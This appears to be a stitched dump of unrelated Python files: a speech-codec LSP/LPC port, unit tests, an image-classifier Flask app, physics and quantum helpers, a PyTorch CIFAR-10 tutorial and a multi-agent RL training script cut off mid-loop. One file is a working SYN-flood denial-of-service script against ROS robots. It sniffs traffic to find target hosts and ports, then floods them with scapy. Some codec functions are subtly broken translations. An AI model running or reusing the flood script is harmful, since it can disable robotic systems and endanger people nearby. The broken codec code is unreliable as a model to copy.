f2[i] = L_sub(f2[i], f2[i - 1]) # f2[i] -= f2[i-1]
a[0 + aOffset] = 4096
j = 10
for i in range(1, 6):
t0 = L_add(f1[i], f2[i]) # f1[i] + f2[i]
# from Q24 to Q12 and * 0.5
a[i] = extract_l(L_shr_r(t0, 13))
t0 = L_sub(f1[i], f2[i]) # f1[i] - f2[i]
# from Q24 to Q12 and * 0.5
a[j + aOffset] = extract_l(L_shr_r(t0, 13))
j = j - 1
def Get_lsp_pol(lsp: List[int], lspIndexOffset: int, f: List[int]) -> None:
"""
lsp[] : line spectral freq. (cosine domain) in Q15
f[] : the coefficients of F1 or F2 in Q24
"""
lspIndex = 0 + lspIndexOffset
fIndex = 0
# All computation in Q24
f[fIndex] = L_mult(4096, 2048) # f[0] = 1.0 in Q24
fIndex = fIndex + 1
f[fIndex] = L_msu(0, lsp[lspIndex], 512) # f[1] = -2.0 * lsp[0] in Q24
fIndex = fIndex + 1
lspIndex = lspIndex + 2 # Advance lsp pointer
for i in range(2, 6):
f[fIndex] = f[fIndex-2]
for j in range(1, i):
hi, lo = L_Extract(f[fIndex-1])
t0 = Mpy_32_16(hi, lo, lsp[lspIndex]) # t0 = f[-1] * lsp
t0 = L_shl(t0, 1)
f[fIndex] = L_add(*f, f[-2]) # *f += f[-2]
f[fIndex] = L_sub(*f, t0) # *f -= t0
fIndex = fIndex - 1
f[fIndex] = L_msu(f[fIndex], lsp[lspIndex], 512) # *f -= lsp<<9
fIndex = fIndex + i # Advance f pointer
# Advance lsp pointer
lspIndex = lspIndex + 2
def Lsf_lsp(lsf: List[int], lsp: List[int], m: int) -> None:
"""
# (i) Q15 : lsf[m] normalized (range: 0.0<=val<=0.5)
# (o) Q15 : lsp[m] (range: -1<=val<1)
# (i) : LPC order
"""
for i in range(0, m):
ind = shr(lsf[i], 8) # ind = b8-b15 of lsf[i]
offset = lsf[i] & 0x00ff # offset = b0-b7 of lsf[i]
# lsp[i] = table[ind]+ ((table[ind+1]-table[ind])*offset) / 256
L_tmp = L_mult(sub(table[ind + 1], table[ind]), offset)
lsp[i] = add(table[ind], extract_l(L_shr(L_tmp, 9)))
def Lsp_lsf(lsp: List[int], lsf: List[int], m: int) -> None:
"""
# (i) Q15 : lsp[m] (range: -1<=val<1)
# (o) Q15 : lsf[m] normalized (range: 0.0<=val<=0.5)
# (i) : LPC order
"""
ind = 63 # begin at end of table -1
for i in range(m - 1, -1, -1):
# find value in table that is just greater than lsp[i]
while sub(table[ind], lsp[i]) < 0:
ind = sub(ind, 1)
# acos(lsp[i])= ind*256 + ( ( lsp[i]-table[ind] ) * slope[ind] )/4096
L_tmp = L_mult(sub(lsp[i], table[ind]), slope[ind])
tmp = round(L_shl(L_tmp, 3)) # (lsp[i]-table[ind])*slope[ind])>>12
lsf[i] = add(tmp, shl(ind, 8))
def Lsf_lsp2(lsf: List[int], lsp: List[int], m: int) -> None:
"""
# (i) Q13 : lsf[m] (range: 0.0<=val<PI)
# (o) Q15 : lsp[m] (range: -1<=val<1)
# (i) : LPC order
"""
for i in range(0, m):
# freq = abs_s(freq)
freq = mult(lsf[i], 20861) # 20861: 1.0/(2.0*PI) in Q17
ind = shr(freq, 8) # ind = b8-b15 of freq
offset = freq & 0x00ff # offset = b0-b7 of freq
if sub(ind, 63) > 0:
ind = 63 # 0 <= ind <= 63
# lsp[i] = table2[ind]+ (slope_cos[ind]*offset >> 12)
L_tmp = L_mult(slope_cos[ind], offset) # L_tmp in Q28
lsp[i] = add(table2[ind], extract_l(L_shr(L_tmp, 13)))
def Lsp_lsf2(lsp: List[int], lsf: List[int], m: int) -> None:
"""
# (i) Q15 : lsp[m] (range: -1<=val<1)
# (o) Q13 : lsf[m] (range: 0.0<=val<PI)
# (i) : LPC order
"""
ind = 63 # begin at end of table2 -1
for i in range(m - 1, -1, -1):
# find value in table2 that is just greater than lsp[i]
while sub(table2[ind], lsp[i]) < 0:
ind = sub(ind, 1)
if ind <= 0:
break
offset = sub(lsp[i], table2[ind])
# acos(lsp[i])= ind*512 + (slope_acos[ind]*offset >> 11)
L_tmp = L_mult(slope_acos[ind], offset) # L_tmp in Q28
freq = add(shl(ind, 9), extract_l(L_shr(L_tmp, 12)))
lsf[i] = mult(freq, 25736) # 25736: 2.0*PI in Q12
def Weight_Az(a: List[int], gamma: int, m: int, ap: List[int]) -> None:
"""
(i) Q12 : a[m+1] LPC coefficients
(i) Q15 : Spectral expansion factor.
(i) : LPC order.
(o) Q12 : Spectral expanded LPC coefficients
"""
ap[0] = a[0]
fac = gamma
for i in range(1, m):
ap[i] = round(L_mult(a[i], fac))
fac = round(L_mult(fac, gamma))
ap[m] = round(L_mult(a[m], fac))
def Weight_Az_2(a: List[int], gamma: int, m: int) -> List[int]:
"""
# (i) Q12 : a[m+1] LPC coefficients
# (i) Q15 : Spectral expansion factor.
# (i) : LPC order.
# (o) Q12 : Spectral expanded LPC coefficients
"""
result = [0] * m
result[0] = a[0]
fac = gamma
for i in range(1, m):
result[i] = round(L_mult(a[i], fac))
fac = round(L_mult(fac, gamma))
result[m] = round(L_mult(a[m], fac))
def Int_qlpc(lsp_old: List[int], lsp_new: List[int], Az: List[int]) -> None:
"""
# input : LSP vector of past frame
# input : LSP vector of present frame
# output: interpolated Az() for the 2 subframes
"""
lsp = [0] * M
# lsp[i] = lsp_new[i] * 0.5 + lsp_old[i] * 0.5
for i in range(0, M):
lsp[i] = add(shr(lsp_new[i], 1), shr(lsp_old[i], 1))
Lsp_Az(lsp, Az, 0) # Subframe 1
Lsp_Az(lsp_new, Az, MP1) # Subframe 2
|
"""Unit tests for runner_impl.py."""
import unittest
import numpy
from deep_learning.engine import q_base
from deep_learning.engine import qfunc_impl
from deep_learning.engine import runner_impl
class ExperienceReplayRunnerTest(unittest.TestCase):
def test_memoryManagement(self):
qfunc = qfunc_impl.RandomValueQFunction(action_space_size=2)
runner = runner_impl.ExperienceReplayRunner(
experience_capacity=1,
experience_sample_batch_size=1,
train_every_n_steps=1)
tran1 = q_base.Transition(
s=numpy.array([[1, 2]]),
a=numpy.array([[1, 0]]),
r=1,
sp=numpy.array([[3, 4]]))
tran2 = q_base.Transition(
s=numpy.array([[3, 4]]),
a=numpy.array([[0, 1]]),
r=1,
sp=numpy.array([[5, 6]]))
runner._protected_ProcessTransition(qfunc, tran1, 0)
runner._protected_ProcessTransition(qfunc, tran2, 1)
hist = runner._experience._history
self.assertEqual(1, len(hist))
self.assertEqual(tran2, hist[0])
|
"""
SYN-ACK DoS attack for ROS
DISCLAIMER: Use against your own hosts only! By no means I encourage or promote the unauthorized tampering with running robotic systems. This can cause serious human harm and material
damages.
"""
import sys
from scapy.all import *
from operator import itemgetter
from scapy.contrib.tcpros import *
bind_layers(TCP, TCPROS)
bind_layers(HTTPRequest, XMLRPC)
bind_layers(HTTPResponse, XMLRPC)
print("Capturing network traffic...")
packages = sniff(iface="eth0", filter="tcp", count=20)
targets = {}
for p in packages[TCPROSBody]:
# Filter by ip
# if p[IP].src == "12.0.0.2":
port = p.sport
ip = p[IP].src
if ip in targets.keys():
targets[ip].append(port)
else:
targets[ip] = [port]
# Get unique values:
for t in targets.keys():
targets[t] = list(set(targets[t]))
# Select one of the targets
dst_target = list(map(itemgetter(0), targets.items()))[0]
dport_target = targets[dst_target]
# Small fix to meet scapy syntax on "dport" key
# if single value, can't go as a list
if len(dport_target) < 2:
dport_target = dport_target[0]
p = (
IP(dst=dst_target, id=1111, ttl=99)
/ TCP(
sport=RandShort(),
dport=dport_target,
seq=1232345,
ack=10000,
window=10000,
flags="S",
)
/ "SYN Flood DoS"
)
ls(p)
ans, unans = srloop(p, inter=0.05, retry=2, timeout=4)
|
from hathor.wallet.resources.address import AddressResource
from hathor.wallet.resources.balance import BalanceResource
from hathor.wallet.resources.history import HistoryResource
from hathor.wallet.resources.lock import LockWalletResource
from hathor.wallet.resources.send_tokens import SendTokensResource
from hathor.wallet.resources.sign_tx import SignTxResource
from hathor.wallet.resources.state import StateWalletResource
from hathor.wallet.resources.unlock import UnlockWalletResource
__all__ = [
'BalanceResource',
'HistoryResource',
'AddressResource',
'SendTokensResource',
'UnlockWalletResource',
'LockWalletResource',
'StateWalletResource',
'SignTxResource',
]
|
import os
import sys
import json
# Flask
from flask import Flask, redirect, url_for, request, render_template, Response, jsonify, redirect
from werkzeug.utils import secure_filename
from gevent.pywsgi import WSGIServer
# TensorFlow and tf.keras
import tensorflow as tf
from tensorflow import keras
import tensorflow_hub as hub
from tensorflow.keras.applications.imagenet_utils import preprocess_input, decode_predictions
from tensorflow.keras.models import load_model, model_from_json
from tensorflow.keras.preprocessing import image
# Some utilites
import numpy as np
from datetime import date
import owncloud
import requests
import urllib
import cv2
# Declare a flask app
app = Flask(__name__)
with open('credentials.txt','r') as f:
f = f.read()
username, password = f.split(' ')
def setup():
today = date.today()
oc = owncloud.Client('http://localhost/owncloud')
oc.login(username, password)
file = f'{today.day}-{today.month}/image.jpg'
link_info = oc.share_file_with_link(f'{file}')
url = link_info.get_link() + "/download"
link = link_info.get_link()[-15:]
link = f'http://localhost/owncloud/index.php/apps/files_sharing/ajax/publicpreview.php?x=1400&y=688&a=true&file=image.jpg&t={link}&scalingup=0'
return link
MODEL_PATH = 'models/tomato_model.h5'
MODEL_JSON = 'models/tomato_model.json'
model = load_model(MODEL_PATH, custom_objects={'KerasLayer':hub.KerasLayer})
model.summary()
classes = ['Tomato___Bacterial_spot' , 'Tomato___Septoria_leaf_spot',
'Tomato___Early_blight', 'Tomato___Spider_mites_Two-spotted_spider_mite',
'Tomato___healthy', 'Tomato___Target_Spot',
'Tomato___Late_blight', 'Tomato___Tomato_mosaic_virus',
'Tomato___Leaf_Mold', 'Tomato___Tomato_Yellow_Leaf_Curl_Virus']
def model_predict(img, model):
img = cv2.resize(img,(224,224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x, mode='tf')
preds = model.predict(x)
return preds
@app.route('/', methods=['GET'])
def index():
return render_template('index.html')
@app.route('/generic', methods=['GET'])
def predict():
today = date.today()
link = setup()
if not os.path.exists(f'{today.day}-{today.month}'):
os.mkdir(f'{today.day}-{today.month}')
# image = requests.get(link)
# with iopen(f'{today.day}-{today.month}/image.jpg', "wb") as file:
# file.write(image.content)
# img_path = os.path.join(f'{today.day}-{today.month}', 'image.jpg')
#with open(f'{today.day}-{today.month}/image.jpg', "rb") as file:
image = urllib.request.urlopen(link)
image = np.asarray(bytearray(image.read()), dtype="uint8")
image = cv2.imdecode(image, cv2.IMREAD_COLOR)
print(image.shape)
preds = model_predict(image, model)
pred_class = classes[np.argmax(preds)]
result = pred_class.replace('_', ' ').capitalize()
return render_template('generic.html',user_image= link,response=json.dumps(result))
if __name__ == '__main__':
http_server = WSGIServer(('0.0.0.0', 5000), app)
http_server.serve_forever()
index()
predict()
|
import logging
import os
from string import Template
import numpy as np
from dataforge import Meta
from phd.thunderstorm.convert_to_hdf5 import get_named_cylinder_readers, get_named_number_readers_1
from phd.utils.convertor_tools import theta_to_direction
from phd.utils.hdf5_tools import get_convertor
from phd.utils.run_tools import multirun_command, general_input_generator, create_gdml, dir_name_generator, \
values_from_dict, InputData
ROOT_PATH = os.path.dirname(__file__)
INPUT_TEMPLATE = """/df/project test
/df/gdml ${path}
/thunderstorm/physics standard_opt_4
/thunderstorm/stacking particle_cylinder
/thunderstorm/addParticleInPCS gamma
/thunderstorm/addParticleInPD e-
/thunderstorm/cut/energy ${cut}
/gps/particle e-
/gps/number 1
/gps/direction ${direction}
/gps/ene/mono ${energy} MeV
/gps/position 0. 0. 0. m
/run/beamOn ${number}
"""
def values_macros_gen(paths):
for path in paths:
for theta in np.arange(0, 91, 10):
for energy in np.arange(0.1, 3.01, 0.05):
if energy > 2 and theta > 55:
continue
values_macros = {
"path": path,
"cut": 0.05,
'number': 1,
'energy': energy,
'direction': theta_to_direction(np.deg2rad(theta)),
}
yield values_macros
def reverse_grid_input_generator(gdml_template_file: str, macros_template: str):
macros_template = Template(macros_template)
values_gdml = {
'height': [0],
'fieldValueZ': 1e-4 * np.arange(5.0, 10.1, 0.5),
}
paths, values_gdml = create_gdml(gdml_template_file, values_gdml)
paths = list(map(lambda x: os.path.join("..", x), paths))
for path, values in zip(
dir_name_generator(".", "sim"),
values_macros_gen(paths)
):
text = macros_template.substitute(values)
path_gdml = values["path"]
indx = paths.index(path_gdml)
input_data_meta = {
"macros": values,
"gdml": values_gdml[indx]
}
data = InputData(
text=text,
path=path,
values=Meta(input_data_meta)
)
yield data
def get_readers():
readers = []
txt = get_named_number_readers_1(["e-"], "particle_detector")
binReader = get_named_cylinder_readers(["e-"], "particle_detector")
readers = readers + txt + binReader
txt = get_named_number_readers_1(["gamma"], "particle_cylinder")
binReader = get_named_cylinder_readers(["gamma"], "particle_cylinder")
readers = readers + txt + binReader
return readers
def main():
logging.basicConfig(filename="run.log")
logging.root.setLevel(logging.DEBUG)
gdml_template = os.path.join(ROOT_PATH, "template", "reversed_electron.gdml")
input_data = reverse_grid_input_generator(gdml_template, INPUT_TEMPLATE)
command = "../../build/thunderstorm/geant4-thunderstorm.exe"
readers = get_readers()
multirun_command(input_data, command, post_processor=get_convertor(readers, "./result.hdf5", clear=False))
return 0
if __name__ == '__main__':
main()
|
import numpy as np
import scipy.sparse
import qutip
def shuffle_indices_scipy_csr(matrix):
"""
Given a scipy.sparse.csr_matrix, shuffle the indices within each row and
return a new array. This should represent the same matrix, but in the less
efficient, "unsorted" manner. All mathematical operations should still
work the same after this, but may be slower.
This is not guaranteed to change the order of the indices in every case.
If there is at most one value per row, there is no unsorted order. In
general, we attempt to shuffle, and if this returns the same order as
before, we just reverse it to ensure it's different.
"""
out = matrix.copy()
for row in range(out.shape[0]):
ptr = (out.indptr[row], out.indptr[row + 1])
if ptr[1] - ptr[0] > 1:
order = np.argsort(np.random.rand(ptr[1] - ptr[0]))
# If sorted, reverse it.
order = np.flip(order) if np.all(order[:-1] < order[1:]) else order
out.indices[ptr[0]:ptr[1]] = out.indices[ptr[0]:ptr[1]][order]
out.data[ptr[0]:ptr[1]] = out.data[ptr[0]:ptr[1]][order]
return out
def random_scipy_csr(shape, density, sorted_):
"""
Generate a random scipy CSR matrix with the given shape, nnz density, and
with indices that are either sorted or unsorted. The nnz elements will
always be at least one.
"""
nnz = int(shape[0] * shape[1] * density) or 1
data = np.random.rand(nnz) + 1j*np.random.rand(nnz)
rows = np.random.choice(np.arange(shape[0]), nnz)
cols = np.random.choice(np.arange(shape[1]), nnz)
sci = scipy.sparse.coo_matrix((data, (rows, cols)), shape=shape).tocsr()
if not sorted_:
shuffle_indices_scipy_csr(sci)
return sci
def random_numpy_dense(shape, fortran):
"""Generate a random numpy dense matrix with the given shape."""
out = np.random.rand(*shape) + 1j*np.random.rand(*shape)
if fortran:
out = np.asfortranarray(out)
return out
def random_csr(shape, density, sorted_):
"""
Generate a random qutip CSR matrix with the given shape, nnz density, and
with indices that are either sorted or unsorted. The nnz elements will
always be at least one (use data.csr.zeros otherwise).
"""
return qutip.core.data.CSR(random_scipy_csr(shape, density, sorted_))
def random_dense(shape, fortran):
"""Generate a random qutip Dense matrix of the given shape."""
return qutip.core.data.Dense(random_numpy_dense(shape, fortran))
|
# coding=utf8
print 'Hello, World!'
|
from ievv_opensource.utils.desktopnotifications.base import AbstractNotification
class Notification(AbstractNotification):
def show_message(self, title, message):
pass
|
'''
通常来说,当你处理图像,文本,语音或者视频数据时,你可以使用标准 python 包将数据加载成 numpy 数组格式,然后将这个数组转换成 torch.*Tensor
对于图像,可以用 Pillow,OpenCV
对于语音,可以用 scipy,librosa
对于文本,可以直接用 Python 或 Cython 基础数据加载模块,或者用 NLTK 和 SpaCy
'''
'''
特别是对于视觉,我们已经创建了一个叫做 totchvision 的包,
该包含有支持加载类似Imagenet,CIFAR10,MNIST 等公共数据集
的数据加载模块 torchvision.datasets 和支持加载图像数据数据转换模块 torch.utils.data.DataLoader。
'''
'''
对于本教程,我们将使用CIFAR10数据集,
它包含十个类别:‘airplane’, ‘automobile’, ‘bird’, ‘cat’, ‘deer’, ‘dog’, ‘frog’, ‘horse’, ‘ship’, ‘truck’。
CIFAR-10 中的图像尺寸为33232,也就是RGB的3层颜色通道,每层通道内的尺寸为32*32。
'''
'''
训练一个图像分类器
我们将按次序的做如下几步:
1. 使用torchvision加载并且归一化CIFAR10的训练和测试数据集
2. 定义一个卷积神经网络
3. 定义一个损失函数
4. 在训练样本数据上训练网络
5. 在测试样本数据上测试网络
'''
'''加载并归一化 CIFAR10 使用 torchvision ,用它来加载 CIFAR10 数据非常简单。'''
import torch
import torchvision
import torchvision.transforms as transforms
'''torchvision 数据集的输出是范围在[0,1]之间的 PILImage,我们将他们转换成归一化范围为[-1,1]之间的张量 Tensors。'''
transform = transforms.Compose(
[transforms.ToTensor(),transforms.Normalize((0.5,0.5,0.5),(0.5,0.5,0.5))]
)
trainset = torchvision.datasets.CIFAR10(root='./data',train = True,download=True,transform=transform) # 数据集会自动下载.
trainloader = torch.utils.data.DataLoader(trainset,batch_size = 4,shuffle = True,num_workers = 2) # 注意这个batch_size
testset = torchvision.datasets.CIFAR10(root='./data',train = False, download=True,transform= transform)
testloader = torch.utils.data.DataLoader(testset,batch_size = 4, shuffle = False, num_workers = 2) # shuffle 是什么含义呢
classes= ('plane', 'car', 'bird', 'cat',
'deer', 'dog', 'frog', 'horse', 'ship', 'truck') # 这是一个元组.
# 让我们来展示其中的一些训练图片。
import matplotlib.pyplot as plt
import numpy as np
def imshow(img):
img = img /2 +0.5 # unnormalize
npimg = img.numpy()
plt.imshow(np.transpose(npimg,(1,2,0))) #这些函数是什么意思都不清楚.
plt.show()
dataiter = iter(trainloader) #了解一下迭代器这个函数
images,labels = dataiter.next() # 我怎么知道这个迭代器返回的数据格式
# show image
imshow(torchvision.utils.make_grid(images)) #make_grid函数???
print(''.join('%5s'% classes[labels[j]] for j in range(4))) #为什么是4呢? batch_size = 4
'''定义一个卷积神经网络 在这之前先 从神经网络章节 复制神经网络,并修改它为3通道的图片(在此之前它被定义为1通道)'''
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net,self).__init__()
self.conv1 = nn.Conv2d(3,6,5)
self.pool = nn.MaxPool2d(2,2) # 卷积核大小吗?
self.conv2 = nn.Conv2d(6,16,5) # 最后一位是卷积核大小
self.fc1 = nn.Linear(16 * 5*5,120)
self.fc2 = nn.Linear(120,84)
self.fc3 = nn.Linear(84,10)
def forward(self,x): # 前向计算的过程
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1,16*5*5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
net = Net()
'''定义一个损失函数和优化器 让我们使用分类交叉熵Cross-Entropy 作损失函数,动量SGD做优化器。'''
import torch.optim as optim
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(),lr = 0.001, momentum = 0.9) #决定了反向传播的过程
'''训练网络 这里事情开始变得有趣,
我们只需要在数据迭代器上循环传给网络和优化器 输入就可以。'''
# for epoch in range(2):
# running_loss = 0.0
# for i, data in enumerate(trainloader,0):
# inputs,labels = data
# optimizer.zero_grad()
# output = net(inputs)
# loss = criterion(output,labels)
# loss.backward()
# optimizer.step()
#
# running_loss +=loss.item()
# if i%2000 == 1999:
# print('[%d, %5d] loss: %.3f' %
# (epoch + 1, i + 1, running_loss / 2000))
# running_loss = 0.0
print('Finished Training')
'''好的,第一步,让我们从测试集中显示一张图像来熟悉它。'''
outputs = net(images)
'''输出是预测与十个类的近似程度,与某一个类的近似程度越高,
网络就越认为图像是属于这一类别。所以让我们打印其中最相似类别类标:'''
_, predicted = torch.max(outputs, 1)
print('Predicted: ', ' '.join('%5s' % classes[predicted[j]]for j in range(4)))
# 结果看起开非常好,让我们看看网络在整个数据集上的表现。
correct = 0
total = 0
with torch.no_grad():
for data in testloader:
images, labels = data
outputs = net(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the 10000 test images: %d %%' % (
100 * correct / total))
'''这看起来比随机预测要好,随机预测的准确率为10%(随机预测出为10类中的哪一类)。看来网络学到了东西。'''
# class_correct = list(0. for i in range(10))
# class_total = list(0. for i in range(10))
# with torch.no_grad():
# for data in testloader:
# images,labels = data
# outputs = net(images)
# _,predicted = torch.max(outputs,1)
# c = (predicted == labels).squeeze()
# for i in range(4):
# label = labels[i]
# class_correct[label] +=c[i].item()
# class_correct[label] +=1
#
# for i in range(10):
# print('Accuracy of %5s : %2d %%' % (
# classes[i], 100 * class_correct[i] / class_total[i]))
'''所以接下来呢?
我们怎么在GPU上跑这些神经网络?
在GPU上训练 就像你怎么把一个张量转移到GPU上一样,你要将神经网络转到GPU上。
如果CUDA可以用,让我们首先定义下我们的设备为第一个可见的cuda设备。'''
device = torch.device('cuda:0' if torch.cuda.is_available() else "cpu")
print(device)
'''接着这些方法会递归地遍历所有模块,并将它们的参数和缓冲器转换为CUDA张量。'''
net.to(device)
'''记住你也必须在每一个步骤向GPU发送输入和目标:'''
inputs, labels = inputs.to(device), labels.to(device)
|
from .text_mel_dataset import TextMelDataset, text_mel_collate
|
'''
Demo run file for different algorithms and Mujoco tasks.
'''
import numpy as np
import torch
import gym
import argparse
import ma_utils
import algorithms.mpe_new_maxminMADDPG as MA_MINE_DDPG
import math
import os
from tensorboardX import SummaryWriter
from multiprocessing import cpu_count
from maddpg.utils.env_wrappers import SubprocVecEnv, DummyVecEnv
import time
cpu_num = 1
os.environ ['OMP_NUM_THREADS'] = str(cpu_num)
os.environ ['OPENBLAS_NUM_THREADS'] = str(cpu_num)
os.environ ['MKL_NUM_THREADS'] = str(cpu_num)
os.environ ['VECLIB_MAXIMUM_THREADS'] = str(cpu_num)
os.environ ['NUMEXPR_NUM_THREADS'] = str(cpu_num)
torch.set_num_threads(cpu_num)
def make_parallel_env(env_id, n_rollout_threads, seed, discrete_action):
def get_env_fn(rank):
def init_env():
env = make_env(env_id, discrete_action=discrete_action)
env.seed(seed + rank * 1000)
np.random.seed(seed + rank * 1000)
return env
return init_env
if n_rollout_threads == 1:
return DummyVecEnv([get_env_fn(0)])
else:
return SubprocVecEnv([get_env_fn(i) for i in range(n_rollout_threads)])
def natural_exp_inc(init_param, max_param, global_step, current_step, inc_step=1000, inc_rate=0.5, stair_case=False):
p = (global_step - current_step) / inc_step
if stair_case:
p = math.floor(p)
increased_param = min((max_param - init_param) * math.exp(-inc_rate * p) + init_param, max_param)
return increased_param
def make_env(scenario_name, benchmark=False,discrete_action=False):
'''
Creates a MultiAgentEnv object as env. This can be used similar to a gym
environment by calling env.reset() and env.step().
Use env.render() to view the environment on the screen.
Input:
scenario_name : name of the scenario from ./scenarios/ to be Returns
(without the .py extension)
benchmark : whether you want to produce benchmarking data
(usually only done during evaluation)
Some useful env properties (see environment.py):
.observation_space : Returns the observation space for each agent
.action_space : Returns the action space for each agent
.n : Returns the number of Agents
'''
from multiagent.environment import MultiAgentEnv
import multiagent.scenarios as scenarios
# load scenario from script
scenario = scenarios.load(scenario_name + ".py").Scenario()
# create world
world = scenario.make_world()
# create multiagent environment
if benchmark:
env = MultiAgentEnv(world, scenario.reset_world, scenario.reward, scenario.observation, scenario.benchmark_data)
else:
env = MultiAgentEnv(world, scenario.reset_world, scenario.reward, scenario.observation )
return env
# Runs policy for X episodes and returns average reward
def evaluate_policy(policy, eval_episodes=10):
avg_reward = 0.
num_step = 0
for _ in range(eval_episodes):
obs = env.reset()
done = False
ep_step_num = 0
#print("obs ",obs)
while ep_step_num < 50:
t = ep_step_num / 1000
obs_t = []
for i in range(n_agents):
obs_t_one = list(obs[i])
obs_t.append(obs_t_one)
obs_t = np.array(obs_t)
num_step +=1
scaled_a_list = []
for i in range(n_agents):
#print("obs_t[i]",obs_t[i])
a = policy.select_action(obs_t[i], i)
scaled_a = np.multiply(a, 1.0)
scaled_a_list.append(scaled_a)
action_n = [[0, a[0], 0, a[1], 0] for a in scaled_a_list]
next_obs, reward, done, _ = env.step(action_n)
next_state = next_obs[0]
obs = next_obs
ep_step_num += 1
avg_reward += reward[0]
avg_reward /= eval_episodes
print("---------------------------------------")
print("Evaluation over %d episodes: %f" % (eval_episodes, avg_reward))
print("---------------------------------------")
return avg_reward,num_step/eval_episodes
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--policy_name", default="DDPG") # Policy name
parser.add_argument("--env_name", default="HalfCheetah-v1") # OpenAI gym environment name
parser.add_argument("--seed", default=1, type=int) # Sets Gym, PyTorch and Numpy seeds
parser.add_argument("--batch_size", default=1024, type=int) # Batch size for both actor and critic
parser.add_argument("--discount", default=0.95, type=float) # Discount factor
parser.add_argument("--tau", default=0.01, type=float) # Target network update rate
parser.add_argument("--policy_freq", default=2, type=int) # Frequency of delayed policy updates
parser.add_argument("--freq_test_mine", default=5e3, type=float)
parser.add_argument("--gpu-no", default='-1', type=str) # GPU number, -1 means CPU
parser.add_argument("--MI_update_freq", default=1, type=int)
parser.add_argument("--max_adv_c", default=0.0, type=float)
parser.add_argument("--min_adv_c", default=0.0, type=float)
parser.add_argument("--discrete_action",action='store_true')
args = parser.parse_args()
file_name = "PMIC_%s_%s_%s_%s_%s"% (args.MI_update_freq,args.max_adv_c,args.min_adv_c,args.env_name,args.seed)
writer = SummaryWriter(log_dir="./tensorboard/" + file_name)
output_dir="./output/" + file_name
model_dir = "./model/" + file_name
if os.path.exists(output_dir) is False :
os.makedirs(output_dir)
if os.path.exists(model_dir) is False :
os.makedirs(model_dir)
print("---------------------------------------")
print("Settings: %s" % (file_name))
print("---------------------------------------")
import os
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_no
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
env = make_parallel_env(args.env_name, 1, args.seed,
args.discrete_action)
env = make_env(args.env_name)
env = env.unwrapped
#env = gym.make(args.env_name)
# Set seeds
env.seed(args.seed)
n_agents = env.n
obs_shape_n = [env.observation_space[i].shape[0] for i in range(env.n)]
print("obs_shape_n ",obs_shape_n)
ac = [env.action_space[i].shape for i in range(env.n)]
action_shape_n = [2 for i in range(env.n)]
print("env .n ",env.n)
torch.cuda.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
torch.manual_seed(args.seed)
np.random.seed(args.seed)
policy = MA_MINE_DDPG.MA_T_DDPG(n_agents,obs_shape_n,sum(obs_shape_n), action_shape_n, 1.0, device,0.0,0.0)
replay_buffer = ma_utils.ReplayBuffer(1e6)
good_data_buffer = ma_utils.embedding_Buffer(1e3)
bad_data_buffer = ma_utils.embedding_Buffer(1e3)
total_timesteps = 0
timesteps_since_eval = 0
episode_num = 0
episode_reward = 0
done = True
get_epoch_Mi = False
Mi_list = []
data_recorder = []
replay_buffer_recorder =[]
moving_avg_reward_list = []
embedding_recorder=[]
best_reward_start = -1
reward_list =[]
eposide_reward_list =[]
recorder_reward = 0
best_reward = -100000000000
eposide_num = -1
current_policy_performance = -1000
episode_timesteps = 25
start_time = time.time()
t1 = time.time()
while total_timesteps < 40e5:
if episode_timesteps == 25:
eposide_num +=1
for d in replay_buffer_recorder:
replay_buffer.add(d,episode_reward)
if total_timesteps != 0:
# walker 50
if len(good_data_buffer.pos_storage_reward) != 0:
if len(moving_avg_reward_list) >=10:
move_avg = np.mean(moving_avg_reward_list[-1000:])
current_policy_performance = move_avg
lowest_reward = good_data_buffer.rank_storage(-100000)
mean_reward = np.mean(good_data_buffer.pos_storage_reward)
if len(moving_avg_reward_list) >=10:
#writer.add_scalar("data/tp_lowest_reward", lowest_reward, total_timesteps)
if lowest_reward < move_avg:
lowest_reward = move_avg
else :
lowest_reward = -500
mean_reward = 0
if lowest_reward < episode_reward:
Obs_list = []
State_list = []
Action_list = []
for d in data_recorder:
obs = d[0]
state = d[1]
Action_list.append(d[2])
Obs_list.append(obs)
State_list.append(state)
for index in range(len(Action_list)):
good_data_buffer.add_pos((Action_list[index], Obs_list[index], State_list[index]),episode_reward)
else :
Obs_list = []
State_list = []
Action_list = []
for d in data_recorder:
obs = d[0]
state = d[1]
Action_list.append(d[2])
Obs_list.append(obs)
State_list.append(state)
for index in range(len(Action_list)):
bad_data_buffer.add_pos((Action_list[index], Obs_list[index], State_list[index]),episode_reward)
# org 10
if len(moving_avg_reward_list) % 10 == 0 :
writer.add_scalar("data/reward", np.mean(moving_avg_reward_list[-1000:]), total_timesteps)
writer.add_scalar("data/data_in_pos", np.mean(good_data_buffer.pos_storage_reward), total_timesteps)
if episode_num%1000 == 0 :
print('Total T:', total_timesteps, 'Episode Num:', episode_num, 'Episode T:', episode_timesteps, 'Reward:', np.mean(moving_avg_reward_list[-1000:])/3.0, " time cost:", time.time() - t1)
t1 = time.time()
if total_timesteps >= 1024 and total_timesteps%100 == 0:
sp_actor_loss_list =[]
process_Q_list = []
process_min_MI_list = []
process_max_MI_list = []
process_min_MI_loss_list = []
process_max_MI_loss_list = []
Q_grads_list =[]
MI_grads_list =[]
for i in range(1):
if len(good_data_buffer.pos_storage)< 500:
process_Q = policy.train(replay_buffer, 1, args.batch_size, args.discount, args.tau)
process_min_MI = 0
process_min_MI_loss = 0
min_mi = 0.0
min_mi_loss = 0.0
process_max_MI = 0
pr_sp_loss = 0.0
Q_grads = 0.0
MI_grads =0.0
process_max_MI_loss = 0.0
else :
if total_timesteps % (args.MI_update_freq*100) == 0 :
if args.min_adv_c > 0.0 :
process_min_MI_loss = policy.train_club(bad_data_buffer, 1, batch_size=args.batch_size)
else :
process_min_MI_loss = 0.0
if args.max_adv_c > 0.0 :
